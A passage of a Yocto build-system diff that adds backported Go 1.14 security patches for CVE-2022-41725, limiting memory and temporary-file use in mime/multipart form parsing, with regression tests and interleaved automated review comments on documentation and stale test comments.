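+- buf.Reset()
+- return "", nil, err
+- }
++type undecodedString struct {
++ isHuff bool
++ b []byte
++}
++
++func (d *Decoder) decodeString(u undecodedString) (string, error) {
++ if !u.isHuff {
++ return string(u.b), nil
++ }
++ buf := bufPool.Get().(*bytes.Buffer)
++ buf.Reset() // don't trust others
++ var s string
++ err := huffmanDecode(buf, d.maxStrLen, u.b)
++ if err == nil {
+ s = buf.String()
+- buf.Reset() // be nice to GC
+ }
+- return s, p[strLen:], nil
++ buf.Reset() // be nice to GC
++ bufPool.Put(buf)
++ return s, err
+ }
+--
+2.7.4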
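Review bot: `undecodedString` and `decodeString` are added without doc comments, and the one property a caller has to know is not written down: `u.b = p[:strLen]` makes `b` a slice of the decoder's input rather than a copy, so it must be decoded before that buffer is reused. I would add `// undecodedString is an hpack string that has been located but not yet decoded; b aliases the input buffer.` above the type and `// decodeString decodes u, Huffman-decoding it when u.isHuff is set.` above the method. The subject says the bundled golang.org/x/net/http2 is updated while the diffstat lists only the vendored `hpack.go`, so it is worth confirming against the upstream commit that no hunk was dropped in the backport.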
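--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
@@ -0,0 +1,85 @@
+From 874b3132a84cf76da6a48978826c04c380a37a50 Mon Sep 17 00:00:00 2001
+From: avivklas <avivklas@gmail.com>
+Date: Fri, 7 Aug 2020 21:50:12 +0300
+Subject: [PATCH] mime/multipart: return overflow errors in Reader.ReadForm
+
+Updates Reader.ReadForm to check for overflow errors that may
+result from a leeway addition of 10MiB to the input argument
+maxMemory.
+
+Fixes #40430
+
+Change-Id: I510b8966c95c51d04695ba9d08fcfe005fd11a5d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/247477
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+Trust: Cuong Manh Le <cuong.manhle.vn@gmail.com>
+Trust: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Emmanuel Odeke <emm.odeke@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/874b3132a84cf76da6a48978826c04c380a37a50]
+CVE: CVE-2022-41725 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 4 ++++
+ src/mime/multipart/formdata_test.go | 18 ++++++++++++++++++
+ 2 files changed, 22 insertions(+)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 832d0ad693666..4eb31012941ac 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "fmt"
+ "io"
+ "io/ioutil"
+ "net/textproto"
+@@ -41,6 +42,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
++ if maxValueBytes <= 0 {
++ return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ }
+ for {
+ p, err := r.NextPart()
+ if err == io.EOF {
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7d756c8c244a0..7112e0d3727fe 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "io"
++ "math"
+ "os"
+ "strings"
+ "testing"
+@@ -52,6 +53,23 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
++// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
++// instead of silently and subtly failing without indication.
++func TestReadFormMaxMemoryOverflow(t *testing.T) {
++ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(math.MaxInt64)
++ if err == nil {
++ t.Fatal("Unexpected a non-nil error")
++ }
++ if f != nil {
++ t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ }
++ if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
++ t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ }
++}
++
+ func TestReadFormWithTextContentType(t *testing.T) {
+ // From https://github.com/golang/go/issues/24041
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))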
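--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
@@ -0,0 +1,97 @@
+From 4e5a313524da62600eb59dbf98624cfe946456f8 Mon Sep 17 00:00:00 2001
+From: Emmanuel T Odeke <emmanuel@orijtech.com>
+Date: Tue, 20 Oct 2020 04:11:12 -0700
+Subject: [PATCH] net/http: test that ParseMultipartForm catches overflows
+
+Tests that if the combination of:
+* HTTP multipart file payload size
+* ParseMultipartForm's maxMemory parameter
+* the internal leeway buffer size of 10MiB
+
+overflows, then we'll report an overflow instead of silently
+passing.
+
+Reapplies and fixes CL 254977, which was reverted in CL 263658.
+
+The prior test lacked a res.Body.Close(), so fixed that and
+added a leaked Transport check to verify correctness.
+
+Updates 40430.
+
+Change-Id: I3c0f7ef43d621f6eb00f07755f04f9f36c51f98f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/263817
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Bryan C. Mills <bcmills@google.com>
+Trust: Damien Neil <dneil@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/4e5a313524da62600eb59dbf98624cfe946456f8]
+CVE: CVE-2022-41725 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/request_test.go | 45 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 45 insertions(+)
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index b4ef472e71229..19526b9ad791a 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -13,6 +13,7 @@ import (
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "mime/multipart"
+ . "net/http"
+ "net/http/httptest"
+@@ -245,6 +246,50 @@ func TestParseMultipartForm(t *testing.T) {
+ }
+ }
+
++// Issue #40430: Test that if maxMemory for ParseMultipartForm when combined with
++// the payload size and the internal leeway buffer size of 10MiB overflows, that we
++// correctly return an error.
++func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
++ defer afterTest(t)
++
++ payloadSize := 1 << 10
++ cst := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
++ // The combination of:
++ // MaxInt64 + payloadSize + (internal spare of 10MiB)
++ // triggers the overflow. See issue https://golang.org/issue/40430/
++ if err := req.ParseMultipartForm(math.MaxInt64); err != nil {
++ Error(rw, err.Error(), StatusBadRequest)
++ return
++ }
++ }))
++ defer cst.Close()
++ fBuf := new(bytes.Buffer)
++ mw := multipart.NewWriter(fBuf)
++ mf, err := mw.CreateFormFile("file", "myfile.txt")
++ if err != nil {
++ t.Fatal(err)
++ }
++ if _, err := mf.Write(bytes.Repeat([]byte("abc"), payloadSize)); err != nil {
++ t.Fatal(err)
++ }
++ if err := mw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ req, err := NewRequest("POST", cst.URL, fBuf)
++ if err != nil {
++ t.Fatal(err)
++ }
++ req.Header.Set("Content-Type", mw.FormDataContentType())
++ res, err := cst.Client().Do(req)
++ if err != nil {
++ t.Fatal(err)
++ }
++ res.Body.Close()
++ if g, w := res.StatusCode, StatusBadRequest; g != w {
++ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
++ }
++}
++
+ func TestRedirect_h1(t *testing.T) { testRedirect(t, h1Mode) }
+ func TestRedirect_h2(t *testing.T) { testRedirect(t, h2Mode) }
+ func testRedirect(t *testing.T, h2 bool) {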
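--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
@@ -0,0 +1,98 @@
+From 5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 3 Dec 2020 09:45:07 -0500
+Subject: [PATCH] mime/multipart: handle ReadForm(math.MaxInt64) better
+
+Returning an error about integer overflow is needlessly pedantic.
+The meaning of ReadForm(MaxInt64) is easily understood
+(accept a lot of data) and can be implemented.
+
+Fixes #40430.
+
+Change-Id: I8a522033dd9a2f9ad31dd2ad82cf08d553736ab9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/275112
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43]
+CVE: CVE-2022-41725 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 8 ++++++--
+ src/mime/multipart/formdata_test.go | 14 +++++---------
+ src/net/http/request_test.go | 2 +-
+ 3 files changed, 12 insertions(+), 12 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 4eb31012941ac..9c42ea8c023b5 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,9 +7,9 @@ package multipart
+ import (
+ "bytes"
+ "errors"
+- "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "net/textproto"
+ "os"
+ )
+@@ -43,7 +43,11 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
+ if maxValueBytes <= 0 {
+- return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ if maxMemory < 0 {
++ maxValueBytes = 0
++ } else {
++ maxValueBytes = math.MaxInt64
++ }
+ }
+ for {
+ p, err := r.NextPart()
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7112e0d3727fe..e3a3a3eae8e15 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -53,20 +53,16 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
+-// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
+-// instead of silently and subtly failing without indication.
++// Issue 40430: Handle ReadForm(math.MaxInt64)
+ func TestReadFormMaxMemoryOverflow(t *testing.T) {
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
+ r := NewReader(b, boundary)
+ f, err := r.ReadForm(math.MaxInt64)
+- if err == nil {
+- t.Fatal("Unexpected a non-nil error")
+- }
+- if f != nil {
+- t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ if err != nil {
++ t.Fatalf("ReadForm(MaxInt64): %v", err)
+ }
+- if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
+- t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ if f == nil {
++ t.Fatal("ReadForm(MaxInt64): missing form")
+ }
+ }
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 19526b9ad791a..689498e19d5dd 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -285,7 +285,7 @@ func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
+ t.Fatal(err)
+ }
+ res.Body.Close()
+- if g, w := res.StatusCode, StatusBadRequest; g != w {
++ if g, w := res.StatusCode, StatusOK; g != w {
+ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
+ }
+ }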
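Review bot: Once the `request_test.go` hunk switches the expectation to `StatusOK`, the comment that CVE-2022-41725-pre2.patch put above `TestMaxInt64ForMultipartFormMaxMemoryOverflow` still says the test checks "that we correctly return an error", and the comment inside the handler still says the sum "triggers the overflow". Both now describe the opposite of what is asserted; the doc comment could read `// Issue #40430: ParseMultipartForm(math.MaxInt64) must be accepted rather than overflow.`. In `formdata.go` the new branch sets `maxValueBytes = 0` for a negative `maxMemory` only when the sum is already `<= 0`, and saturates to `math.MaxInt64` otherwise, so the existing `// Reserve an additional 10 MB for non-file parts.` comment should mention the clamp. The test function's body lies outside this hunk.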
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
new file mode 100644
index 0000000000..5f80c62b0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
@@ -0,0 +1,660 @@
1From 5c55ac9bf1e5f779220294c843526536605f42ab Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 25 Jan 2023 09:27:01 -0800
4Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit memory/inode consumption of ReadForm
5
6Reader.ReadForm is documented as storing "up to maxMemory bytes + 10MB"
7in memory. Parsed forms can consume substantially more memory than
8this limit, since ReadForm does not account for map entry overhead
9and MIME headers.
10
11In addition, while the amount of disk memory consumed by ReadForm can
12be constrained by limiting the size of the parsed input, ReadForm will
13create one temporary file per form part stored on disk, potentially
14consuming a large number of inodes.
15
16Update ReadForm's memory accounting to include part names,
17MIME headers, and map entry overhead.
18
19Update ReadForm to store all on-disk file parts in a single
20temporary file.
21
22Files returned by FileHeader.Open are documented as having a concrete
23type of *os.File when a file is stored on disk. The change to use a
24single temporary file for all parts means that this is no longer the
25case when a form contains more than a single file part stored on disk.
26
27The previous behavior of storing each file part in a separate disk
28file may be reenabled with GODEBUG=multipartfiles=distinct.
29
30Update Reader.NextPart and Reader.NextRawPart to set a 10MiB cap
31on the size of MIME headers.
32
33Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
34
35Updates #58006
36Fixes #58362
37Fixes CVE-2022-41725
38
39Change-Id: Ibd780a6c4c83ac8bcfd3cbe344f042e9940f2eab
40Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1714276
41Reviewed-by: Julie Qiu <julieqiu@google.com>
42TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
43Reviewed-by: Roland Shoemaker <bracewell@google.com>
44Run-TryBot: Damien Neil <dneil@google.com>
45(cherry picked from commit ed4664330edcd91b24914c9371c377c132dbce8c)
46Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728949
47Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
48Run-TryBot: Roland Shoemaker <bracewell@google.com>
49Reviewed-by: Damien Neil <dneil@google.com>
50Reviewed-on: https://go-review.googlesource.com/c/go/+/468116
51TryBot-Result: Gopher Robot <gobot@golang.org>
52Reviewed-by: Than McIntosh <thanm@google.com>
53Run-TryBot: Michael Pratt <mpratt@google.com>
54Auto-Submit: Michael Pratt <mpratt@google.com>
55
56Upstream-Status: Backport [https://github.com/golang/go/commit/5c55ac9bf1e5f779220294c843526536605f42ab]
57CVE: CVE-2022-41725
58Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
59---
60 src/mime/multipart/formdata.go | 132 ++++++++++++++++++++-----
61 src/mime/multipart/formdata_test.go | 140 ++++++++++++++++++++++++++-
62 src/mime/multipart/multipart.go | 25 +++--
63 src/mime/multipart/readmimeheader.go | 14 +++
64 src/net/http/request_test.go | 2 +-
65 src/net/textproto/reader.go | 27 ++++++
66 6 files changed, 303 insertions(+), 37 deletions(-)
67 create mode 100644 src/mime/multipart/readmimeheader.go
68
69diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
70index 9c42ea8..1eeb340 100644
71--- a/src/mime/multipart/formdata.go
72+++ b/src/mime/multipart/formdata.go
73@@ -7,6 +7,7 @@ package multipart
74 import (
75 "bytes"
76 "errors"
77+ "internal/godebug"
78 "io"
79 "io/ioutil"
80 "math"
81@@ -34,23 +35,58 @@ func (r *Reader) ReadForm(maxMemory int64) (*Form, error) {
82
83 func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
84 form := &Form{make(map[string][]string), make(map[string][]*FileHeader)}
85+ var (
86+ file *os.File
87+ fileOff int64
88+ )
89+ numDiskFiles := 0
90+ multipartFiles := godebug.Get("multipartfiles")
91+ combineFiles := multipartFiles != "distinct"
92 defer func() {
93+ if file != nil {
94+ if cerr := file.Close(); err == nil {
95+ err = cerr
96+ }
97+ }
98+ if combineFiles && numDiskFiles > 1 {
99+ for _, fhs := range form.File {
100+ for _, fh := range fhs {
101+ fh.tmpshared = true
102+ }
103+ }
104+ }
105 if err != nil {
106 form.RemoveAll()
107+ if file != nil {
108+ os.Remove(file.Name())
109+ }
110 }
111 }()
112
113- // Reserve an additional 10 MB for non-file parts.
114- maxValueBytes := maxMemory + int64(10<<20)
115- if maxValueBytes <= 0 {
116+ // maxFileMemoryBytes is the maximum bytes of file data we will store in memory.
117+ // Data past this limit is written to disk.
118+ // This limit strictly applies to content, not metadata (filenames, MIME headers, etc.),
119+ // since metadata is always stored in memory, not disk.
120+ //
121+ // maxMemoryBytes is the maximum bytes we will store in memory, including file content,
122+ // non-file part values, metdata, and map entry overhead.
123+ //
124+ // We reserve an additional 10 MB in maxMemoryBytes for non-file data.
125+ //
126+ // The relationship between these parameters, as well as the overly-large and
127+ // unconfigurable 10 MB added on to maxMemory, is unfortunate but difficult to change
128+ // within the constraints of the API as documented.
129+ maxFileMemoryBytes := maxMemory
130+ maxMemoryBytes := maxMemory + int64(10<<20)
131+ if maxMemoryBytes <= 0 {
132 if maxMemory < 0 {
133- maxValueBytes = 0
134+ maxMemoryBytes = 0
135 } else {
136- maxValueBytes = math.MaxInt64
137+ maxMemoryBytes = math.MaxInt64
138 }
139 }
140 for {
141- p, err := r.NextPart()
142+ p, err := r.nextPart(false, maxMemoryBytes)
143 if err == io.EOF {
144 break
145 }
146@@ -64,16 +100,27 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
147 }
148 filename := p.FileName()
149
150+ // Multiple values for the same key (one map entry, longer slice) are cheaper
151+ // than the same number of values for different keys (many map entries), but
152+ // using a consistent per-value cost for overhead is simpler.
153+ maxMemoryBytes -= int64(len(name))
154+ maxMemoryBytes -= 100 // map overhead
155+ if maxMemoryBytes < 0 {
156+ // We can't actually take this path, since nextPart would already have
157+ // rejected the MIME headers for being too large. Check anyway.
158+ return nil, ErrMessageTooLarge
159+ }
160+
161 var b bytes.Buffer
162
163 if filename == "" {
164 // value, store as string in memory
165- n, err := io.CopyN(&b, p, maxValueBytes+1)
166+ n, err := io.CopyN(&b, p, maxMemoryBytes+1)
167 if err != nil && err != io.EOF {
168 return nil, err
169 }
170- maxValueBytes -= n
171- if maxValueBytes < 0 {
172+ maxMemoryBytes -= n
173+ if maxMemoryBytes < 0 {
174 return nil, ErrMessageTooLarge
175 }
176 form.Value[name] = append(form.Value[name], b.String())
177@@ -81,35 +128,45 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
178 }
179
180 // file, store in memory or on disk
181+ maxMemoryBytes -= mimeHeaderSize(p.Header)
182+ if maxMemoryBytes < 0 {
183+ return nil, ErrMessageTooLarge
184+ }
185 fh := &FileHeader{
186 Filename: filename,
187 Header: p.Header,
188 }
189- n, err := io.CopyN(&b, p, maxMemory+1)
190+ n, err := io.CopyN(&b, p, maxFileMemoryBytes+1)
191 if err != nil && err != io.EOF {
192 return nil, err
193 }
194- if n > maxMemory {
195- // too big, write to disk and flush buffer
196- file, err := ioutil.TempFile("", "multipart-")
197- if err != nil {
198- return nil, err
199+ if n > maxFileMemoryBytes {
200+ if file == nil {
201+ file, err = ioutil.TempFile(r.tempDir, "multipart-")
202+ if err != nil {
203+ return nil, err
204+ }
205 }
206+ numDiskFiles++
207 size, err := io.Copy(file, io.MultiReader(&b, p))
208- if cerr := file.Close(); err == nil {
209- err = cerr
210- }
211 if err != nil {
212- os.Remove(file.Name())
213 return nil, err
214 }
215 fh.tmpfile = file.Name()
216 fh.Size = size
217+ fh.tmpoff = fileOff
218+ fileOff += size
219+ if !combineFiles {
220+ if err := file.Close(); err != nil {
221+ return nil, err
222+ }
223+ file = nil
224+ }
225 } else {
226 fh.content = b.Bytes()
227 fh.Size = int64(len(fh.content))
228- maxMemory -= n
229- maxValueBytes -= n
230+ maxFileMemoryBytes -= n
231+ maxMemoryBytes -= n
232 }
233 form.File[name] = append(form.File[name], fh)
234 }
235@@ -117,6 +174,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
236 return form, nil
237 }
238
239+func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
240+ for k, vs := range h {
241+ size += int64(len(k))
242+ size += 100 // map entry overhead
243+ for _, v := range vs {
244+ size += int64(len(v))
245+ }
246+ }
247+ return size
248+}
249+
250 // Form is a parsed multipart form.
251 // Its File parts are stored either in memory or on disk,
252 // and are accessible via the *FileHeader's Open method.
253@@ -134,7 +202,7 @@ func (f *Form) RemoveAll() error {
254 for _, fh := range fhs {
255 if fh.tmpfile != "" {
256 e := os.Remove(fh.tmpfile)
257- if e != nil && err == nil {
258+ if e != nil && !errors.Is(e, os.ErrNotExist) && err == nil {
259 err = e
260 }
261 }
262@@ -149,15 +217,25 @@ type FileHeader struct {
263 Header textproto.MIMEHeader
264 Size int64
265
266- content []byte
267- tmpfile string
268+ content []byte
269+ tmpfile string
270+ tmpoff int64
271+ tmpshared bool
272 }
273
274 // Open opens and returns the FileHeader's associated File.
275 func (fh *FileHeader) Open() (File, error) {
276 if b := fh.content; b != nil {
277 r := io.NewSectionReader(bytes.NewReader(b), 0, int64(len(b)))
278- return sectionReadCloser{r}, nil
279+ return sectionReadCloser{r, nil}, nil
280+ }
281+ if fh.tmpshared {
282+ f, err := os.Open(fh.tmpfile)
283+ if err != nil {
284+ return nil, err
285+ }
286+ r := io.NewSectionReader(f, fh.tmpoff, fh.Size)
287+ return sectionReadCloser{r, f}, nil
288 }
289 return os.Open(fh.tmpfile)
290 }
291@@ -176,8 +254,12 @@ type File interface {
292
293 type sectionReadCloser struct {
294 *io.SectionReader
295+ io.Closer
296 }
297
298 func (rc sectionReadCloser) Close() error {
299+ if rc.Closer != nil {
300+ return rc.Closer.Close()
301+ }
302 return nil
303 }
304diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
305index e3a3a3e..5cded71 100644
306--- a/src/mime/multipart/formdata_test.go
307+++ b/src/mime/multipart/formdata_test.go
308@@ -6,8 +6,10 @@ package multipart
309
310 import (
311 "bytes"
312+ "fmt"
313 "io"
314 "math"
315+ "net/textproto"
316 "os"
317 "strings"
318 "testing"
319@@ -208,8 +210,8 @@ Content-Disposition: form-data; name="largetext"
320 maxMemory int64
321 err error
322 }{
323- {"smaller", 50, nil},
324- {"exact-fit", 25, nil},
325+ {"smaller", 50 + int64(len("largetext")) + 100, nil},
326+ {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
327 {"too-large", 0, ErrMessageTooLarge},
328 }
329 for _, tc := range testCases {
330@@ -224,7 +226,7 @@ Content-Disposition: form-data; name="largetext"
331 defer f.RemoveAll()
332 }
333 if tc.err != err {
334- t.Fatalf("ReadForm error - got: %v; expected: %v", tc.err, err)
335+ t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
336 }
337 if err == nil {
338 if g := f.Value["largetext"][0]; g != largeTextValue {
339@@ -234,3 +236,135 @@ Content-Disposition: form-data; name="largetext"
340 })
341 }
342 }
343+
344+// TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
345+// MIME headers, and map entry overhead while limiting the memory consumption of parsed forms.
346+func TestReadForm_MetadataTooLarge(t *testing.T) {
347+ for _, test := range []struct {
348+ name string
349+ f func(*Writer)
350+ }{{
351+ name: "large name",
352+ f: func(fw *Writer) {
353+ name := strings.Repeat("a", 10<<20)
354+ w, _ := fw.CreateFormField(name)
355+ w.Write([]byte("value"))
356+ },
357+ }, {
358+ name: "large MIME header",
359+ f: func(fw *Writer) {
360+ h := make(textproto.MIMEHeader)
361+ h.Set("Content-Disposition", `form-data; name="a"`)
362+ h.Set("X-Foo", strings.Repeat("a", 10<<20))
363+ w, _ := fw.CreatePart(h)
364+ w.Write([]byte("value"))
365+ },
366+ }, {
367+ name: "many parts",
368+ f: func(fw *Writer) {
369+ for i := 0; i < 110000; i++ {
370+ w, _ := fw.CreateFormField("f")
371+ w.Write([]byte("v"))
372+ }
373+ },
374+ }} {
375+ t.Run(test.name, func(t *testing.T) {
376+ var buf bytes.Buffer
377+ fw := NewWriter(&buf)
378+ test.f(fw)
379+ if err := fw.Close(); err != nil {
380+ t.Fatal(err)
381+ }
382+ fr := NewReader(&buf, fw.Boundary())
383+ _, err := fr.ReadForm(0)
384+ if err != ErrMessageTooLarge {
385+ t.Errorf("fr.ReadForm() = %v, want ErrMessageTooLarge", err)
386+ }
387+ })
388+ }
389+}
390+
391+// TestReadForm_ManyFiles_Combined tests that a multipart form containing many files only
392+// results in a single on-disk file.
393+func TestReadForm_ManyFiles_Combined(t *testing.T) {
394+ const distinct = false
395+ testReadFormManyFiles(t, distinct)
396+}
397+
398+// TestReadForm_ManyFiles_Distinct tests that setting GODEBUG=multipartfiles=distinct
399+// results in every file in a multipart form being placed in a distinct on-disk file.
400+func TestReadForm_ManyFiles_Distinct(t *testing.T) {
401+ t.Setenv("GODEBUG", "multipartfiles=distinct")
402+ const distinct = true
403+ testReadFormManyFiles(t, distinct)
404+}
405+
406+func testReadFormManyFiles(t *testing.T, distinct bool) {
407+ var buf bytes.Buffer
408+ fw := NewWriter(&buf)
409+ const numFiles = 10
410+ for i := 0; i < numFiles; i++ {
411+ name := fmt.Sprint(i)
412+ w, err := fw.CreateFormFile(name, name)
413+ if err != nil {
414+ t.Fatal(err)
415+ }
416+ w.Write([]byte(name))
417+ }
418+ if err := fw.Close(); err != nil {
419+ t.Fatal(err)
420+ }
421+ fr := NewReader(&buf, fw.Boundary())
422+ fr.tempDir = t.TempDir()
423+ form, err := fr.ReadForm(0)
424+ if err != nil {
425+ t.Fatal(err)
426+ }
427+ for i := 0; i < numFiles; i++ {
428+ name := fmt.Sprint(i)
429+ if got := len(form.File[name]); got != 1 {
430+ t.Fatalf("form.File[%q] has %v entries, want 1", name, got)
431+ }
432+ fh := form.File[name][0]
433+ file, err := fh.Open()
434+ if err != nil {
435+ t.Fatalf("form.File[%q].Open() = %v", name, err)
436+ }
437+ if distinct {
438+ if _, ok := file.(*os.File); !ok {
439+ t.Fatalf("form.File[%q].Open: %T, want *os.File", name, file)
440+ }
441+ }
442+ got, err := io.ReadAll(file)
443+ file.Close()
444+ if string(got) != name || err != nil {
445+ t.Fatalf("read form.File[%q]: %q, %v; want %q, nil", name, string(got), err, name)
446+ }
447+ }
448+ dir, err := os.Open(fr.tempDir)
449+ if err != nil {
450+ t.Fatal(err)
451+ }
452+ defer dir.Close()
453+ names, err := dir.Readdirnames(0)
454+ if err != nil {
455+ t.Fatal(err)
456+ }
457+ wantNames := 1
458+ if distinct {
459+ wantNames = numFiles
460+ }
461+ if len(names) != wantNames {
462+ t.Fatalf("temp dir contains %v files; want 1", len(names))
463+ }
464+ if err := form.RemoveAll(); err != nil {
465+ t.Fatalf("form.RemoveAll() = %v", err)
466+ }
467+ names, err = dir.Readdirnames(0)
468+ if err != nil {
469+ t.Fatal(err)
470+ }
471+ if len(names) != 0 {
472+ t.Fatalf("temp dir contains %v files; want 0", len(names))
473+ }
474+}
475diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
476index 1750300..958cef8 100644
477--- a/src/mime/multipart/multipart.go
478+++ b/src/mime/multipart/multipart.go
479@@ -121,12 +121,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
480 return n, r.err
481 }
482
483-func newPart(mr *Reader, rawPart bool) (*Part, error) {
484+func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
485 bp := &Part{
486 Header: make(map[string][]string),
487 mr: mr,
488 }
489- if err := bp.populateHeaders(); err != nil {
490+ if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
491 return nil, err
492 }
493 bp.r = partReader{bp}
494@@ -142,12 +142,16 @@ func newPart(mr *Reader, rawPart bool) (*Part, error) {
495 return bp, nil
496 }
497
498-func (bp *Part) populateHeaders() error {
499+func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
500 r := textproto.NewReader(bp.mr.bufReader)
501- header, err := r.ReadMIMEHeader()
502+ header, err := readMIMEHeader(r, maxMIMEHeaderSize)
503 if err == nil {
504 bp.Header = header
505 }
506+ // TODO: Add a distinguishable error to net/textproto.
507+ if err != nil && err.Error() == "message too large" {
508+ err = ErrMessageTooLarge
509+ }
510 return err
511 }
512
513@@ -287,6 +291,7 @@ func (p *Part) Close() error {
514 // isn't supported.
515 type Reader struct {
516 bufReader *bufio.Reader
517+ tempDir string // used in tests
518
519 currentPart *Part
520 partsRead int
521@@ -297,6 +302,10 @@ type Reader struct {
522 dashBoundary []byte // "--boundary"
523 }
524
525+// maxMIMEHeaderSize is the maximum size of a MIME header we will parse,
526+// including header keys, values, and map overhead.
527+const maxMIMEHeaderSize = 10 << 20
528+
529 // NextPart returns the next part in the multipart or an error.
530 // When there are no more parts, the error io.EOF is returned.
531 //
532@@ -304,7 +313,7 @@ type Reader struct {
533 // has a value of "quoted-printable", that header is instead
534 // hidden and the body is transparently decoded during Read calls.
535 func (r *Reader) NextPart() (*Part, error) {
536- return r.nextPart(false)
